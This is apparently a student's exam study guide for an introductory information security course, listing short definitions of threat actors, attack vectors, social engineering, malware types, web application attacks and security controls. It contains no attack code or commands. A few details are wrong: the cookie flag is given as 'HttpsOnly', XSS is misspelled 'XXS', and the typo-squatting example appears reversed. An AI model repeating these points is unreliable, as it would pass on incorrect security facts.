INMT441 FINAL EXAM 1 STUDY GUIDE

Confidentiality (CIA Triad)

Only authorized users have access

Control = Encryption (Ex: Encrypting files in transfer)

Integrity (CIA Triad)

Data is correct and unaltered

Control = Hashing/Digital Signature (Ex: File hash verification)

Availability (CIA Triad)

Data is accessible to authorized users

Control = Backups, redundancy (Ex: Disaster recovery servers)

Script Kiddies (Threat Actor)

Amateur attackers using prebuilt tools, low skill.

Insiders (Threat Actor)

Employees/contractors (can be malicious or accidental)

State Actors (Threat Actor)

Well-funded attackers with geopolitical goals (ex: Solarwinds supply chain attack)

Advanced Persistent Threats (APT) (Threat Actor)

Skilled, well-funded, long-term stealthy attacks targeting high-value assets.

Hacktivists (Threat Actor)

Ideology-driven attackers

(Ex: defacing company website for activism)

Competitors (Threat Actor)

Steal things like trade secrets or customer lists for business advantage

Brokers (Threat Actor)

Discover vulnerabilities and sell them on the black market.

Shadow IT (Threat Actors)

Employees using unauthorized apps/devices, creating weak points.

Platform Vulnerabilities

OS flaws, legacy systems, hardware weaknesses

Configuration Vulnerabilities

Weak passwords, open ports, insecure protocols.

Third-Party Vulnerabilities

Risks from contractors, vendors, supply chain access.

Patch Vulnerabilities

Delays or improper implementation of security updates.

Zero-Day Vulnerabilities

Vulnerabilities that are unknown until already exploited by hacker

Email Attack Vector

Phishing, malware attachments

Wireless Attack Vector

Packet sniffing, file interception

Removable Media Attack Vector

USB drops with malware

Direct Access Attack Vector

Tailgating, physical tampering

Social Media Attack Vector

Impersonation, intel gathering

Supply Chain Attack Vectors

Pre-infected hardware, compromised vendors

Cloud Attack Vectors

Misconfigured storage, exposed sensitive files

Main Psychological Principles behind Social Engineering

(An Inside Cook Scams Us Fast w/ Tricks)

Authority, Intimidation, Consensus, Scarcity, Urgency, Familiarity, Trust.

Phishing (Social Engineering)

Mass scam emails

Spear Phishing (Social Engineering)

Targeted phishing at specific individuals

Whaling (Social Engineering)

Phishing aimed at executives

Vishing (Social Engineering)

Fraud phone calls

Smishing (Social Engineering)

Fraud text messages

Business Email Compromise (BEC) (Social Engineering)

Fake invoices/Payment scams

Physical methods of Social Engineering

Dumpster diving, Tailgating, USB drops, Shoulder surfing

Advanced Social Engineering Methods

AI-enabled deepfakes, fake voices

Typo-Squatting (Social Engineering)

Lookalike domain names (victoriassecret.com instead of the real website victoriasecret.com)

Pharming (Social Engineering)

Redirecting victims to spoofed website

• Malware-based (host file changes)

• DNS-based (server table modified)

Watering Hole Attack (Social Engineering)

Infecting a website commonly visited by a target group

Masking (Data Protection Control)

Hiding sensitive data elements (ex: SSN → ***1234).

Tokenization (Data Protection Control)

Replacing sensitive data with meaningless tokens (credit cards, SSNs).

Encryption (Data Protection Control)

Mathematical scrambling using keys.

Minimization (Data Protection Control)

Collecting only necessary data.

Segmentation (Data Protection Control)

Splits a database into smaller parts to limit access and contain breaches

Virus (Malware)

Needs user action to spread.

Worm (Malware)

Self-spreads via networks.

Polymorphic Virus (Malware)

Mutates to evade detection.

Trojan (Malware)

Malicious software disguised as legitimate software.

RAT (Remote Access Trojan) (Malware)

Trojan with remote control capability.

Ransomware (Malware)

Encrypts files, demands payment for decryption (ex: WannaCry).

Logic Bomb (Malware)

Malicious code triggered by time/event.

Rootkit (Malware)

Hides in the OS to avoid detection and give attackers privileged control.

Spyware (Malware)

Collects info; keyloggers record keystrokes.

Backdoor (Malware)

Hidden entry that attackers can abuse to bypass security (Can be easily abused)

Buffer Overflow (Software & Application Attacks)

Overwrites memory, causing crash/exploit.

Integer Overflow (Software & Application Attacks)

Exploits arithmetic limits.

Improper Input/Exception Handling (Software & Application Attacks)

Reveals system errors or info.

SQL Injection (Software & Application Attacks)

Malicious queries steal/modify database data.

XXS (Cross-Site Scripting) (Software & Application Attacks)

Injects malicious scripts.

Types of XSS (Software & Application Attacks)

• Stored (in database, permanent)

• Reflected (URL-based, temporary)

• DOM-based (client-side script manipulation)

XSS impacts (Software & Application Attacks)

Cookie theft, session hijack, malware injection.

CSRF (Cross-Site Request Forgery) (Software & Application Attacks)

Tricking user into executing attacker’s action.

SSRF (Server-Side Request Forgery) (Software & Application Attacks)

Attacker makes a web app request internal resources.

Replay Attack (Software & Application Attacks)

Captured login/authentication packets re-sent.

Signature-based Antivirus (Endpoint Security)

Detects known threats

Anomaly-based Antivirus (Endpoint Security)

Detects unusual behavior

Browser Protections (Endpoint Security)

HttpsOnly (cookies inaccessible to JS),

SameSite (restricts cross-site sharing)

EDR (Endpoint Detection & Response) (Endpoint Security)

Logs, anomaly detection

Hardening Techniques (Endpoint Security)

1. Patch management

2. Sandbox (isolated environment)

3. Allow/Deny lists (app restrictions)

4. Close unused ports

Preventative Controls (Risk Controls)

Detective Controls (Risk Controls)

Corrective Controls (Risk Controls)

Compensating Controls (Risk Controls)

Deterrent Controls (Risk Controls)

CCTV = (Risk Controls)

Deterrent + Detective

IPS/IDS = (Risk Controls)

Detective + Preventative